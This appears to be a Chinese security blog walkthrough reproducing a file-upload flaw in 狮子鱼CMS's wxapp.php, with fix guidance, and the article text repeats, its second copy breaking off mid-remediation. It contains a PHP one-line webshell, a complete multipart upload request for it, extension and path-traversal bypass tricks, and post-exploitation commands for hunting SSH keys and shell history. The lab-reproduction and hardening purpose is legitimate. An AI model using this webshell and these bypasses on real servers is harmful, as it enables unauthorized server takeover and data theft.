1. 项目概述一次典型CMS文件上传漏洞的深度剖析最近在梳理一些老旧CMS系统的安全问题时又一次遇到了“狮子鱼CMS”。这个系统在几年前的一些中小型电商、内容展示类网站中应用还算广泛但随着技术栈的迭代其安全问题也逐渐暴露出来。这次要复现的是其wxapp.php文件中存在的一个文件上传漏洞。对于安全研究者和渗透测试工程师来说文件上传漏洞几乎是“兵家必争之地”它直接、有效往往能成为获取服务器权限的突破口。这个漏洞本身并不复杂但非常典型它完美地展示了当开发者对用户输入过于信任、对文件上传逻辑校验不严时会引发怎样的连锁反应。通过这次复现我们不仅能掌握一个特定漏洞的利用方法更能深入理解文件上传漏洞的通用审计思路和防御策略这对于构建自身代码的安全意识至关重要。2. 漏洞原理与核心逻辑拆解2.1 狮子鱼CMS与wxapp.php的背景狮子鱼CMS是一个基于PHP开发的综合性内容管理系统其架构设计上包含了面向微信小程序的接口模块wxapp.php正是这个模块的入口文件之一。在早期的设计理念中为了快速实现功能开发者有时会将小程序后端的部分管理功能如图片上传、富文本编辑器文件上传等通过一个统一的接口暴露出来并寄希望于前端或小程序端的校验来保证安全。wxapp.php文件通常负责处理来自微信小程序端的请求包括用户登录、数据提交和文件上传等操作。问题就出在这个“文件上传”操作的处理逻辑上。2.2 漏洞触发的关键代码逻辑分析虽然我们无法直接获取到漏洞版本的完整源代码但根据漏洞披露信息和常规的代码模式我们可以重构出存在问题的核心逻辑。一个典型的、存在缺陷的文件上传处理代码段可能如下所示// wxapp.php 中可能存在的一段问题代码 $action $_GET[action]; if ($action upload) { $file $_FILES[file]; if ($file[error] 0) { echo json_encode([code-1, msg上传出错]); exit; } // 关键问题点1未校验上传来源或Token // 关键问题点2未对文件内容进行严格检查 $tmp_name $file[tmp_name]; $file_name $file[name]; // 直接使用用户可控的文件名可能导致目录穿越 $save_path ./uploads/wxapp/ . $file_name; // 移动临时文件到目标路径 if (move_uploaded_file($tmp_name, $save_path)) { echo json_encode([code0, msg上传成功, url$save_path]); } else { echo json_encode([code-1, msg移动文件失败]); } }这段代码暴露了几个致命问题身份与权限校验缺失接口没有验证请求是否来自合法的、已授权的小程序会话。攻击者可以伪造请求直接调用此接口。文件类型校验形同虚设代码仅检查了PHP系统上传错误$file[‘error’]但没有对文件的扩展名、MIME类型或文件头进行任何有效性校验。文件名完全用户可控$file[‘name’]直接拼接进保存路径。攻击者可以通过构造包含路径遍历字符如../../../的文件名将文件上传到Web目录以外的任意可写位置甚至覆盖系统关键文件。未使用白名单机制这是最核心的问题。安全的文件上传应该基于“白名单”机制即只允许明确指定的、安全的文件类型如.jpg, .png上传。而此处是典型的“黑名单”思维或者根本没有名单默认允许所有类型这为上传Webshell如.php,.jsp文件敞开了大门。注意在实际的漏洞中问题可能更隐蔽。例如代码可能先检查了扩展名但使用了有缺陷的黑名单如str_replace(‘php’, ‘’, $ext)这无法防御.phtml或.php5或者保存路径虽然由时间戳生成但文件内容未被二次渲染检查导致图片马将恶意代码嵌入图片EXIF或尾部的上传成功。2.3 漏洞利用的影响范围与危害成功利用此漏洞攻击者可以实现上传Webshell直接上传一个包含PHP代码的文本文件如shell.php从而获得一个在目标服务器上执行任意命令的后门。目录穿越与文件覆盖通过精心构造的文件名攻击者可能将恶意文件上传到网站根目录、配置文件目录甚至系统目录造成更广泛的破坏。获取服务器控制权结合Webshell攻击者可以浏览服务器文件、窃取数据库信息、植入勒索软件或将其作为攻击其他内网机器的跳板。数据泄露与篡改针对使用狮子鱼CMS的网站可能导致用户数据、交易信息等敏感内容泄露。这个漏洞的利用条件相对较低只要存在漏洞的wxapp.php文件能够被外部访问且上传目录具有执行PHP脚本的权限这在很多默认配置的服务器上成立攻击就可以成功。3. 漏洞复现环境搭建与准备3.1 实验环境配置为了安全、合法地复现此漏洞我们必须在一个完全隔离的环境中进行。推荐使用虚拟机搭建测试环境。操作系统与Web服务虚拟机系统Windows 10 或 Ubuntu 20.04 LTS。Web服务器XAMPP集成Apache、MySQL、PHP环境。选择PHP版本时应尽量匹配漏洞可能存在的历史版本如PHP 5.6或7.0这些版本在某些安全特性如register_globals 虽不直接相关但影响整体环境上与当前版本有差异。数据库MySQL 5.x 随XAMPP安装即可。目标源码获取需要寻找到存在漏洞的狮子鱼CMS历史版本。这通常可以通过一些开源软件存档网站、GitHub的历史提交记录或安全研究社区分享的漏洞测试包获得。务必注意仅用于本地授权测试切勿下载和测试未知来源的线上系统。将下载的CMS源码解压到XAMPP的htdocs目录下例如D:\xampp\htdocs\shiziyu_cms。环境初始化启动XAMPP控制面板开启Apache和MySQL服务。访问http://localhost/shiziyu_cms/install/ 按照安装向导完成CMS的安装。安装过程中记下数据库名、用户名和密码。安装完成后访问后台通常为http://localhost/shiziyy_cms/admin 确认系统可以正常登录和运行。3.2 漏洞定位与初步探测安装完成后我们的目标是找到并分析wxapp.php文件。文件定位在CMS根目录下寻找wxapp.php。有时它可能在api/、controller/或app/等子目录下。代码审计用代码编辑器如VS Code, Sublime Text打开wxapp.php。使用搜索功能查找关键词如upload、$_FILES、move_uploaded_file、action。接口探测尝试直接访问该文件如http://localhost/shiziyu_cms/wxapp.php。页面可能会空白、返回错误或输出一些JSON数据。通过Burp Suite或浏览器开发者工具的网络面板观察其正常请求和响应尝试构造?actionupload的GET参数。工具准备Burp Suite Community/Professional用于拦截、重放和修改HTTP请求是漏洞测试的核心工具。中国菜刀/蚁剑/Cobalt Strike用于连接和管理上传成功的Webshell。在测试环境中我们使用开源的“蚁剑AntSword”作为演示其跨平台和插件化特性较好。浏览器Chrome或Firefox配合开发者工具。文本编辑器用于编写简单的Webshell。4. 漏洞手工复现与利用全流程4.1 信息收集与接口发现首先我们需要确认漏洞接口确实存在且可访问。打开浏览器访问CMS首页确保应用运行正常。打开Burp Suite配置代理通常为127.0.0.1:8080并设置浏览器使用该代理。在浏览器中随意操作同时观察Burp的Proxy - HTTP history标签页。过滤出包含wxapp.php的请求。如果没有发现可以尝试直接访问http://target/wxapp.php或者结合目录扫描工具如dirsearch对CMS目录进行扫描寻找可能的入口。假设我们发现了这样一个请求GET /shiziyu_cms/wxapp.php?actiongetinfo HTTP/1.1 Host: localhost ...这证实了wxapp.php文件存在并且通过action参数来区分功能。4.2 构造恶意上传请求这是漏洞利用的核心步骤。我们需要向wxapp.php?actionupload发送一个POST请求其中包含一个恶意的文件上传表单。第一步准备Webshell创建一个最简单的PHP Webshell文件命名为shell.php注意实际攻击中会使用更隐蔽的名字。?php eval($_POST[cmd]);?这个一句话木马通过POST参数cmd来接收并执行任意PHP代码。第二步使用Burp Suite构造攻击请求在Burp的Proxy - Intercept标签页确保拦截是开启的Intercept is on。在浏览器中找到一个可能存在上传功能的前端页面比如小程序模拟器或后台某个上传点尝试上传一张正常图片。这个操作会被Burp拦截。在Burp的拦截界面我们将原始的上传图片请求修改为攻击请求。但更直接的方法是使用Repeater模块手工构造。在Repeater中我们全新构造一个HTTP请求POST /shiziyu_cms/wxapp.php?actionupload HTTP/1.1 Host: localhost Content-Type: multipart/form-data; boundary----WebKitFormBoundaryABC123 Content-Length: [计算后的长度] ------WebKitFormBoundaryABC123 Content-Disposition: form-data; namefile; filenameshell.php Content-Type: application/octet-stream ?php eval($_POST[cmd]);? ------WebKitFormBoundaryABC123--关键参数解释Content-Type: multipart/form-data这是文件上传必须的格式。boundary分隔符用于分隔表单中的不同字段。可以是任意字符串但需要与正文中的分隔符一致。name”file”表单中文件字段的名称。这需要根据实际代码确定可能是file、upfile、img等。如果不对应服务器无法接收到文件。这里我们假设为file。filename”shell.php”这是攻击的关键。我们直接指定文件名为shell.php。在某些漏洞版本中甚至可以尝试filename”../../../shell.php”进行目录穿越。Content-Type: application/octet-stream我们故意将PHP文件的MIME类型设置为二进制流而不是text/php以绕过可能存在的基于MIME的简单检查。实操心得在实际测试中filename的构造是门艺术。如果直接传.php被拦截可以尝试以下变种大小写绕过Shell.Php、SHELL.PHP。特殊后缀.php5、.phtml、.phps如果服务器配置了这些扩展名由PHP解析。双写/点号绕过shell.p.phphp如果过滤逻辑是删除php字符串则可能变为shell.php、shell.php.Windows系统可能会自动去除末尾的点。0x00截断在特定PHP版本5.3.4且magic_quotes_gpcoff时可以在路径中插入空字符%00如filename”shell.php%00.jpg”配合保存路径如$save_path ‘./uploads/’ . $file_name . ‘.jpg’;最终保存的文件名会是shell.php。但这种方法在现代PHP环境中已基本失效。第三步发送请求并观察响应在Burp Repeater中点击“Send”按钮。观察右侧的响应Response。成功响应可能如下{code:0, msg:上传成功, url:./uploads/wxapp/shell.php}这明确告诉我们文件已上传成功并给出了访问路径。失败响应可能如下{“code”:-1, “msg”:”文件类型不允许”}说明有基础的文件扩展名检查。{“code”:-1, “msg”:”上传失败”}可能是目录不可写或权限问题。返回一个空白页或系统错误可能是代码执行出错需要结合Apache错误日志查看。4.3 Webshell连接与验证如果上传成功我们就获得了服务器上的一个后门。确定Webshell地址根据服务器返回的url字段拼接上网站根目录。例如返回./uploads/wxapp/shell.php那么完整的访问URL就是http://localhost/shiziyu_cms/uploads/wxapp/shell.php。使用蚁剑连接打开蚁剑点击“添加数据”。URL地址填入上一步得到的完整URL。连接密码填入我们Webshell中定义的密码即cmd对应$_POST[‘cmd’]。编码器、请求头等选项可以先保持默认。点击“添加”。如果一切正常左侧列表会出现该站点双击即可连接。执行命令验证连接成功后在蚁剑的虚拟终端或文件管理界面中尝试执行一个简单命令如whoami或dir D:\Windows /ls -la /Linux。如果成功返回系统信息则证明漏洞利用完全成功我们已经获得了该Web服务进程权限下的命令执行能力。5. 漏洞深度利用与后续渗透思路5.1 权限提升与信息收集获取Webshell通常只是第一步其权限往往受限于Web服务器进程如www-data,apache,nobody。我们需要进行信息收集寻找提权机会。系统信息通过Webshell执行systeminfoWin或uname -a; cat /etc/issueLinux查看系统版本、补丁情况。网络信息执行ipconfig /all或ifconfig; netstat -antp 查看服务器IP、内网网段和开放端口探测内网其他资产。用户与进程查看当前用户权限whoami /all 列出进程tasklist或ps aux 寻找以高权限如root, SYSTEM运行的服务或程序。敏感文件查找搜索网站配置文件config.php,database.php、数据库备份文件、SSH私钥id_rsa、历史命令文件.bash_history等。5.2 漏洞的多种变形与绕过技巧如果第一次简单的.php文件上传失败说明存在一定的防护。我们需要根据响应和代码逻辑如果可能的话进行绕过。场景一前端JS校验现象在浏览器中选择非图片文件时页面直接弹出提示“请选择图片文件”请求甚至没有发送到服务器。绕过直接使用Burp Suite拦截修改上传请求将filename和Content-Type改为合法值如shell.jpg和image/jpeg但文件内容保持不变。或者直接禁用浏览器JS。场景二服务端MIME类型检查现象服务器返回“文件类型不正确”。绕过将请求中的Content-Type头改为image/jpeg或image/png。同时可以尝试制作“图片马”即在一个真实的图片文件末尾追加PHP代码。上传后如果服务器存在“文件包含漏洞”或许能通过包含这个图片文件来执行代码。场景三服务端扩展名黑名单现象服务器返回“禁止上传php等脚本文件”。绕过名单不全尝试.php5,.phtml,.phps,.inc等。解析漏洞利用服务器配置特性。例如IIS 6.0的目录名.asp/解析漏洞、Nginx的文件名.jpg/.php解析漏洞错误配置导致。对于Apache可以尝试上传.htaccess文件配置将.jpg文件解析为PHPAddType application/x-httpd-php .jpg。大小写/点号/空格如前所述。双写绕过如果过滤规则是str_replace(‘php’, ‘’, $filename)那么shell.p.phphp会被处理成shell.php。场景四服务端文件内容检查图片头现象服务器对文件内容进行检测要求必须是真实的图片格式如检查GIF89a, PNG头。绕过使用工具如edjpgcom或者直接使用十六进制编辑器在真实的图片文件开头或不影响图片显示的EXIF信息区域插入PHP代码。上传后配合文件包含漏洞利用。或者寻找不检查文件尾部的实现将PHP代码追加在图片数据之后。6. 漏洞修复与安全加固方案6.1 临时应急措施如果线上系统不幸中招应立即采取以下措施隔离与排查立即将受影响的服务器或应用从网络中断开。通过Webshell查杀工具、检查最近被修改的PHP文件、结合访问日志查看wxapp.php的异常访问记录定位并清除所有恶意后门文件。禁用漏洞入口最直接的方法是重命名或删除存在漏洞的wxapp.php文件或者在该文件开头加入exit();或die(‘Access Denied’);语句。但这可能会影响正常的微信小程序功能。权限限制确保上传目录如uploads/没有执行脚本的权限。在Apache配置中可以添加Directory /path/to/your/uploads php_flag engine off Options -ExecCGI RemoveHandler .php .php5 .phtml /Directory在Nginx配置中可以添加location ~ ^/uploads/.*\.(php|php5|phtml)$ { deny all; }6.2 根本性修复方案修复代码是杜绝漏洞的根本。针对wxapp.php的上传逻辑必须进行多重、严格的校验。1. 身份与权限验证 在文件上传逻辑开始前必须验证用户的登录状态和操作权限。例如检查小程序传来的、经过签名的Token或Session。session_start(); if (!isset($_SESSION[wxapp_user_id]) || $_SESSION[wxapp_user_role] 1) { echo json_encode([code403, msg未授权访问]); exit; }2. 使用白名单校验文件扩展名 只允许明确安全的文件类型。$allowed_exts [jpg, jpeg, png, gif, bmp]; // 图片白名单 $file_name $_FILES[file][name]; $file_ext strtolower(pathinfo($file_name, PATHINFO_EXTENSION)); if (!in_array($file_ext, $allowed_exts)) { echo json_encode([code-1, msg不支持的文件类型]); exit; }3. 使用白名单校验MIME类型 检查PHP获取到的文件MIME类型。$allowed_mimes [image/jpeg, image/png, image/gif]; $file_mime $_FILES[file][type]; if (!in_array($file_mime, $allowed_mimes)) { echo json_encode([code-1, msg文件格式非法]); exit; } // 注意$_FILES[‘type’]可能被客户端伪造因此不能单独依赖此项。4. 校验文件内容图片重渲染 对于图片最安全的方式是使用GD库或ImageMagick进行二次渲染保存渲染后的新图片。这可以彻底剥离任何嵌入的恶意代码。if ($file_ext jpg || $file_ext jpeg) { $image imagecreatefromjpeg($tmp_name); } elseif ($file_ext png) { $image imagecreatefrompng($tmp_name); } elseif ($file_ext gif) { $image imagecreatefromgif($tmp_name); } if ($image false) { echo json_encode([code-1, msg非法的图片文件]); exit; } // 生成一个随机的安全文件名 $new_file_name md5(uniqid() . microtime()) . . . $file_ext; $save_path ./uploads/wxapp/ . $new_file_name; // 保存重新渲染的图片 imagejpeg($image, $save_path, 90); // 对于PNG/GIF使用对应函数 imagedestroy($image);5. 限制文件上传目录与权限将上传目录设置为Web根目录之外如果可能。确保上传目录的权限设置为755文件权限设置为644避免执行权限。使用move_uploaded_file()函数它比copy()或rename()更安全会检查文件是否是合法的HTTP POST上传文件。6. 记录与监控 记录所有上传操作包括时间、IP、用户ID、原始文件名、保存路径等便于事后审计和追踪。7. 从漏洞复现中提炼的通用审计与防御经验这次对狮子鱼CMS文件上传漏洞的复现不仅仅是一次简单的“攻击模仿”更是一次深刻的安全思维训练。它让我再次确认了几个在安全开发中必须坚守的原则第一永远不要信任客户端。无论是前端JS校验、隐藏的表单字段还是HTTP请求头攻击者都可以轻松绕过。所有安全校验必须在服务端进行。第二白名单优于黑名单。定义什么是“允许的”比定义什么是“禁止的”要安全得多。黑名单永远有遗漏而白名单将未知风险挡在门外。第三最小权限原则。上传目录只给写入权限不给执行权限。应用程序运行账户如www-data的权限应被严格限制避免一旦被攻破就导致全盘沦陷。第四深度防御。单一的安全措施容易被绕过。应该构建从身份验证、扩展名检查、MIME检查、内容检查到服务器配置加固的多层防御体系。即使一层被突破其他层还能提供保护。第五安全是一个持续的过程。修复一个已知漏洞后应该对代码进行全面的安全审计检查是否还存在类似问题。同时保持框架和依赖库的更新关注安全社区的动态才能应对不断演变的安全威胁。在渗透测试工作中遇到这类CMS漏洞手工复现的意义在于理解漏洞的每一个细节和上下文这远比使用自动化工具跑出一个结果更有价值。它帮助你建立对系统脆弱点的直觉并在未来自己设计系统时能本能地避开这些“坑”。对于开发者而言每一次漏洞分析报告都应该被视为一次宝贵的学习机会推动着代码朝着更健壮、更安全的方向演进。
文件上传漏洞深度剖析:从原理到实战,以狮子鱼CMS为例
发布时间:2026/6/26 15:19:46
1. 项目概述一次典型CMS文件上传漏洞的深度剖析最近在梳理一些老旧CMS系统的安全问题时又一次遇到了“狮子鱼CMS”。这个系统在几年前的一些中小型电商、内容展示类网站中应用还算广泛但随着技术栈的迭代其安全问题也逐渐暴露出来。这次要复现的是其wxapp.php文件中存在的一个文件上传漏洞。对于安全研究者和渗透测试工程师来说文件上传漏洞几乎是“兵家必争之地”它直接、有效往往能成为获取服务器权限的突破口。这个漏洞本身并不复杂但非常典型它完美地展示了当开发者对用户输入过于信任、对文件上传逻辑校验不严时会引发怎样的连锁反应。通过这次复现我们不仅能掌握一个特定漏洞的利用方法更能深入理解文件上传漏洞的通用审计思路和防御策略这对于构建自身代码的安全意识至关重要。2. 漏洞原理与核心逻辑拆解2.1 狮子鱼CMS与wxapp.php的背景狮子鱼CMS是一个基于PHP开发的综合性内容管理系统其架构设计上包含了面向微信小程序的接口模块wxapp.php正是这个模块的入口文件之一。在早期的设计理念中为了快速实现功能开发者有时会将小程序后端的部分管理功能如图片上传、富文本编辑器文件上传等通过一个统一的接口暴露出来并寄希望于前端或小程序端的校验来保证安全。wxapp.php文件通常负责处理来自微信小程序端的请求包括用户登录、数据提交和文件上传等操作。问题就出在这个“文件上传”操作的处理逻辑上。2.2 漏洞触发的关键代码逻辑分析虽然我们无法直接获取到漏洞版本的完整源代码但根据漏洞披露信息和常规的代码模式我们可以重构出存在问题的核心逻辑。一个典型的、存在缺陷的文件上传处理代码段可能如下所示// wxapp.php 中可能存在的一段问题代码 $action $_GET[action]; if ($action upload) { $file $_FILES[file]; if ($file[error] 0) { echo json_encode([code-1, msg上传出错]); exit; } // 关键问题点1未校验上传来源或Token // 关键问题点2未对文件内容进行严格检查 $tmp_name $file[tmp_name]; $file_name $file[name]; // 直接使用用户可控的文件名可能导致目录穿越 $save_path ./uploads/wxapp/ . $file_name; // 移动临时文件到目标路径 if (move_uploaded_file($tmp_name, $save_path)) { echo json_encode([code0, msg上传成功, url$save_path]); } else { echo json_encode([code-1, msg移动文件失败]); } }这段代码暴露了几个致命问题身份与权限校验缺失接口没有验证请求是否来自合法的、已授权的小程序会话。攻击者可以伪造请求直接调用此接口。文件类型校验形同虚设代码仅检查了PHP系统上传错误$file[‘error’]但没有对文件的扩展名、MIME类型或文件头进行任何有效性校验。文件名完全用户可控$file[‘name’]直接拼接进保存路径。攻击者可以通过构造包含路径遍历字符如../../../的文件名将文件上传到Web目录以外的任意可写位置甚至覆盖系统关键文件。未使用白名单机制这是最核心的问题。安全的文件上传应该基于“白名单”机制即只允许明确指定的、安全的文件类型如.jpg, .png上传。而此处是典型的“黑名单”思维或者根本没有名单默认允许所有类型这为上传Webshell如.php,.jsp文件敞开了大门。注意在实际的漏洞中问题可能更隐蔽。例如代码可能先检查了扩展名但使用了有缺陷的黑名单如str_replace(‘php’, ‘’, $ext)这无法防御.phtml或.php5或者保存路径虽然由时间戳生成但文件内容未被二次渲染检查导致图片马将恶意代码嵌入图片EXIF或尾部的上传成功。2.3 漏洞利用的影响范围与危害成功利用此漏洞攻击者可以实现上传Webshell直接上传一个包含PHP代码的文本文件如shell.php从而获得一个在目标服务器上执行任意命令的后门。目录穿越与文件覆盖通过精心构造的文件名攻击者可能将恶意文件上传到网站根目录、配置文件目录甚至系统目录造成更广泛的破坏。获取服务器控制权结合Webshell攻击者可以浏览服务器文件、窃取数据库信息、植入勒索软件或将其作为攻击其他内网机器的跳板。数据泄露与篡改针对使用狮子鱼CMS的网站可能导致用户数据、交易信息等敏感内容泄露。这个漏洞的利用条件相对较低只要存在漏洞的wxapp.php文件能够被外部访问且上传目录具有执行PHP脚本的权限这在很多默认配置的服务器上成立攻击就可以成功。3. 漏洞复现环境搭建与准备3.1 实验环境配置为了安全、合法地复现此漏洞我们必须在一个完全隔离的环境中进行。推荐使用虚拟机搭建测试环境。操作系统与Web服务虚拟机系统Windows 10 或 Ubuntu 20.04 LTS。Web服务器XAMPP集成Apache、MySQL、PHP环境。选择PHP版本时应尽量匹配漏洞可能存在的历史版本如PHP 5.6或7.0这些版本在某些安全特性如register_globals 虽不直接相关但影响整体环境上与当前版本有差异。数据库MySQL 5.x 随XAMPP安装即可。目标源码获取需要寻找到存在漏洞的狮子鱼CMS历史版本。这通常可以通过一些开源软件存档网站、GitHub的历史提交记录或安全研究社区分享的漏洞测试包获得。务必注意仅用于本地授权测试切勿下载和测试未知来源的线上系统。将下载的CMS源码解压到XAMPP的htdocs目录下例如D:\xampp\htdocs\shiziyu_cms。环境初始化启动XAMPP控制面板开启Apache和MySQL服务。访问http://localhost/shiziyu_cms/install/ 按照安装向导完成CMS的安装。安装过程中记下数据库名、用户名和密码。安装完成后访问后台通常为http://localhost/shiziyy_cms/admin 确认系统可以正常登录和运行。3.2 漏洞定位与初步探测安装完成后我们的目标是找到并分析wxapp.php文件。文件定位在CMS根目录下寻找wxapp.php。有时它可能在api/、controller/或app/等子目录下。代码审计用代码编辑器如VS Code, Sublime Text打开wxapp.php。使用搜索功能查找关键词如upload、$_FILES、move_uploaded_file、action。接口探测尝试直接访问该文件如http://localhost/shiziyu_cms/wxapp.php。页面可能会空白、返回错误或输出一些JSON数据。通过Burp Suite或浏览器开发者工具的网络面板观察其正常请求和响应尝试构造?actionupload的GET参数。工具准备Burp Suite Community/Professional用于拦截、重放和修改HTTP请求是漏洞测试的核心工具。中国菜刀/蚁剑/Cobalt Strike用于连接和管理上传成功的Webshell。在测试环境中我们使用开源的“蚁剑AntSword”作为演示其跨平台和插件化特性较好。浏览器Chrome或Firefox配合开发者工具。文本编辑器用于编写简单的Webshell。4. 漏洞手工复现与利用全流程4.1 信息收集与接口发现首先我们需要确认漏洞接口确实存在且可访问。打开浏览器访问CMS首页确保应用运行正常。打开Burp Suite配置代理通常为127.0.0.1:8080并设置浏览器使用该代理。在浏览器中随意操作同时观察Burp的Proxy - HTTP history标签页。过滤出包含wxapp.php的请求。如果没有发现可以尝试直接访问http://target/wxapp.php或者结合目录扫描工具如dirsearch对CMS目录进行扫描寻找可能的入口。假设我们发现了这样一个请求GET /shiziyu_cms/wxapp.php?actiongetinfo HTTP/1.1 Host: localhost ...这证实了wxapp.php文件存在并且通过action参数来区分功能。4.2 构造恶意上传请求这是漏洞利用的核心步骤。我们需要向wxapp.php?actionupload发送一个POST请求其中包含一个恶意的文件上传表单。第一步准备Webshell创建一个最简单的PHP Webshell文件命名为shell.php注意实际攻击中会使用更隐蔽的名字。?php eval($_POST[cmd]);?这个一句话木马通过POST参数cmd来接收并执行任意PHP代码。第二步使用Burp Suite构造攻击请求在Burp的Proxy - Intercept标签页确保拦截是开启的Intercept is on。在浏览器中找到一个可能存在上传功能的前端页面比如小程序模拟器或后台某个上传点尝试上传一张正常图片。这个操作会被Burp拦截。在Burp的拦截界面我们将原始的上传图片请求修改为攻击请求。但更直接的方法是使用Repeater模块手工构造。在Repeater中我们全新构造一个HTTP请求POST /shiziyu_cms/wxapp.php?actionupload HTTP/1.1 Host: localhost Content-Type: multipart/form-data; boundary----WebKitFormBoundaryABC123 Content-Length: [计算后的长度] ------WebKitFormBoundaryABC123 Content-Disposition: form-data; namefile; filenameshell.php Content-Type: application/octet-stream ?php eval($_POST[cmd]);? ------WebKitFormBoundaryABC123--关键参数解释Content-Type: multipart/form-data这是文件上传必须的格式。boundary分隔符用于分隔表单中的不同字段。可以是任意字符串但需要与正文中的分隔符一致。name”file”表单中文件字段的名称。这需要根据实际代码确定可能是file、upfile、img等。如果不对应服务器无法接收到文件。这里我们假设为file。filename”shell.php”这是攻击的关键。我们直接指定文件名为shell.php。在某些漏洞版本中甚至可以尝试filename”../../../shell.php”进行目录穿越。Content-Type: application/octet-stream我们故意将PHP文件的MIME类型设置为二进制流而不是text/php以绕过可能存在的基于MIME的简单检查。实操心得在实际测试中filename的构造是门艺术。如果直接传.php被拦截可以尝试以下变种大小写绕过Shell.Php、SHELL.PHP。特殊后缀.php5、.phtml、.phps如果服务器配置了这些扩展名由PHP解析。双写/点号绕过shell.p.phphp如果过滤逻辑是删除php字符串则可能变为shell.php、shell.php.Windows系统可能会自动去除末尾的点。0x00截断在特定PHP版本5.3.4且magic_quotes_gpcoff时可以在路径中插入空字符%00如filename”shell.php%00.jpg”配合保存路径如$save_path ‘./uploads/’ . $file_name . ‘.jpg’;最终保存的文件名会是shell.php。但这种方法在现代PHP环境中已基本失效。第三步发送请求并观察响应在Burp Repeater中点击“Send”按钮。观察右侧的响应Response。成功响应可能如下{code:0, msg:上传成功, url:./uploads/wxapp/shell.php}这明确告诉我们文件已上传成功并给出了访问路径。失败响应可能如下{“code”:-1, “msg”:”文件类型不允许”}说明有基础的文件扩展名检查。{“code”:-1, “msg”:”上传失败”}可能是目录不可写或权限问题。返回一个空白页或系统错误可能是代码执行出错需要结合Apache错误日志查看。4.3 Webshell连接与验证如果上传成功我们就获得了服务器上的一个后门。确定Webshell地址根据服务器返回的url字段拼接上网站根目录。例如返回./uploads/wxapp/shell.php那么完整的访问URL就是http://localhost/shiziyu_cms/uploads/wxapp/shell.php。使用蚁剑连接打开蚁剑点击“添加数据”。URL地址填入上一步得到的完整URL。连接密码填入我们Webshell中定义的密码即cmd对应$_POST[‘cmd’]。编码器、请求头等选项可以先保持默认。点击“添加”。如果一切正常左侧列表会出现该站点双击即可连接。执行命令验证连接成功后在蚁剑的虚拟终端或文件管理界面中尝试执行一个简单命令如whoami或dir D:\Windows /ls -la /Linux。如果成功返回系统信息则证明漏洞利用完全成功我们已经获得了该Web服务进程权限下的命令执行能力。5. 漏洞深度利用与后续渗透思路5.1 权限提升与信息收集获取Webshell通常只是第一步其权限往往受限于Web服务器进程如www-data,apache,nobody。我们需要进行信息收集寻找提权机会。系统信息通过Webshell执行systeminfoWin或uname -a; cat /etc/issueLinux查看系统版本、补丁情况。网络信息执行ipconfig /all或ifconfig; netstat -antp 查看服务器IP、内网网段和开放端口探测内网其他资产。用户与进程查看当前用户权限whoami /all 列出进程tasklist或ps aux 寻找以高权限如root, SYSTEM运行的服务或程序。敏感文件查找搜索网站配置文件config.php,database.php、数据库备份文件、SSH私钥id_rsa、历史命令文件.bash_history等。5.2 漏洞的多种变形与绕过技巧如果第一次简单的.php文件上传失败说明存在一定的防护。我们需要根据响应和代码逻辑如果可能的话进行绕过。场景一前端JS校验现象在浏览器中选择非图片文件时页面直接弹出提示“请选择图片文件”请求甚至没有发送到服务器。绕过直接使用Burp Suite拦截修改上传请求将filename和Content-Type改为合法值如shell.jpg和image/jpeg但文件内容保持不变。或者直接禁用浏览器JS。场景二服务端MIME类型检查现象服务器返回“文件类型不正确”。绕过将请求中的Content-Type头改为image/jpeg或image/png。同时可以尝试制作“图片马”即在一个真实的图片文件末尾追加PHP代码。上传后如果服务器存在“文件包含漏洞”或许能通过包含这个图片文件来执行代码。场景三服务端扩展名黑名单现象服务器返回“禁止上传php等脚本文件”。绕过名单不全尝试.php5,.phtml,.phps,.inc等。解析漏洞利用服务器配置特性。例如IIS 6.0的目录名.asp/解析漏洞、Nginx的文件名.jpg/.php解析漏洞错误配置导致。对于Apache可以尝试上传.htaccess文件配置将.jpg文件解析为PHPAddType application/x-httpd-php .jpg。大小写/点号/空格如前所述。双写绕过如果过滤规则是str_replace(‘php’, ‘’, $filename)那么shell.p.phphp会被处理成shell.php。场景四服务端文件内容检查图片头现象服务器对文件内容进行检测要求必须是真实的图片格式如检查GIF89a, PNG头。绕过使用工具如edjpgcom或者直接使用十六进制编辑器在真实的图片文件开头或不影响图片显示的EXIF信息区域插入PHP代码。上传后配合文件包含漏洞利用。或者寻找不检查文件尾部的实现将PHP代码追加在图片数据之后。6. 漏洞修复与安全加固方案6.1 临时应急措施如果线上系统不幸中招应立即采取以下措施隔离与排查立即将受影响的服务器或应用从网络中断开。通过Webshell查杀工具、检查最近被修改的PHP文件、结合访问日志查看wxapp.php的异常访问记录定位并清除所有恶意后门文件。禁用漏洞入口最直接的方法是重命名或删除存在漏洞的wxapp.php文件或者在该文件开头加入exit();或die(‘Access Denied’);语句。但这可能会影响正常的微信小程序功能。权限限制确保上传目录如uploads/没有执行脚本的权限。在Apache配置中可以添加Directory /path/to/your/uploads php_flag engine off Options -ExecCGI RemoveHandler .php .php5 .phtml /Directory在Nginx配置中可以添加location ~ ^/uploads/.*\.(php|php5|phtml)$ { deny all; }6.2 根本性修复方案修复代码是杜绝漏洞的根本。针对wxapp.php的上传逻辑必须进行多重、严格的校验。1. 身份与权限验证 在文件上传逻辑开始前必须验证用户的登录状态和操作权限。例如检查小程序传来的、经过签名的Token或Session。session_start(); if (!isset($_SESSION[wxapp_user_id]) || $_SESSION[wxapp_user_role] 1) { echo json_encode([code403, msg未授权访问]); exit; }2. 使用白名单校验文件扩展名 只允许明确安全的文件类型。$allowed_exts [jpg, jpeg, png, gif, bmp]; // 图片白名单 $file_name $_FILES[file][name]; $file_ext strtolower(pathinfo($file_name, PATHINFO_EXTENSION)); if (!in_array($file_ext, $allowed_exts)) { echo json_encode([code-1, msg不支持的文件类型]); exit; }3. 使用白名单校验MIME类型 检查PHP获取到的文件MIME类型。$allowed_mimes [image/jpeg, image/png, image/gif]; $file_mime $_FILES[file][type]; if (!in_array($file_mime, $allowed_mimes)) { echo json_encode([code-1, msg文件格式非法]); exit; } // 注意$_FILES[‘type’]可能被客户端伪造因此不能单独依赖此项。4. 校验文件内容图片重渲染 对于图片最安全的方式是使用GD库或ImageMagick进行二次渲染保存渲染后的新图片。这可以彻底剥离任何嵌入的恶意代码。if ($file_ext jpg || $file_ext jpeg) { $image imagecreatefromjpeg($tmp_name); } elseif ($file_ext png) { $image imagecreatefrompng($tmp_name); } elseif ($file_ext gif) { $image imagecreatefromgif($tmp_name); } if ($image false) { echo json_encode([code-1, msg非法的图片文件]); exit; } // 生成一个随机的安全文件名 $new_file_name md5(uniqid() . microtime()) . . . $file_ext; $save_path ./uploads/wxapp/ . $new_file_name; // 保存重新渲染的图片 imagejpeg($image, $save_path, 90); // 对于PNG/GIF使用对应函数 imagedestroy($image);5. 